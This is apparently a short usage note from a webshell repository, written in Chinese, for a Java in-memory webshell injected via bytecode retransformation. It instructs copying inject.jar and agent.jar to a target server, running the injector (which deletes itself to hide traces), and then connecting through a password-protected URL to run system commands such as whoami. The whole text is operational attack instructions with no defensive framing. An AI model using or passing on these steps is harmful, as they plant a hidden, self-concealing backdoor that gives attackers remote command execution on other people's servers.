webshell/java/字节码增强型/retransform字节码.md

347 B
Raw Permalink Blame History

将release中的inject.jar agent.jar复制目标服务器。

运行inject.jar:

(测试时注意备份会删除自身和agent.jar)

java -jar inject.jar 123

连接内存马:

http://ip:port/1.jsp?pass_the_world=123&model=chopper

执行命令:

http://ip:port/1.jsp?pass_the_world=123&model=exec&cmd=whoami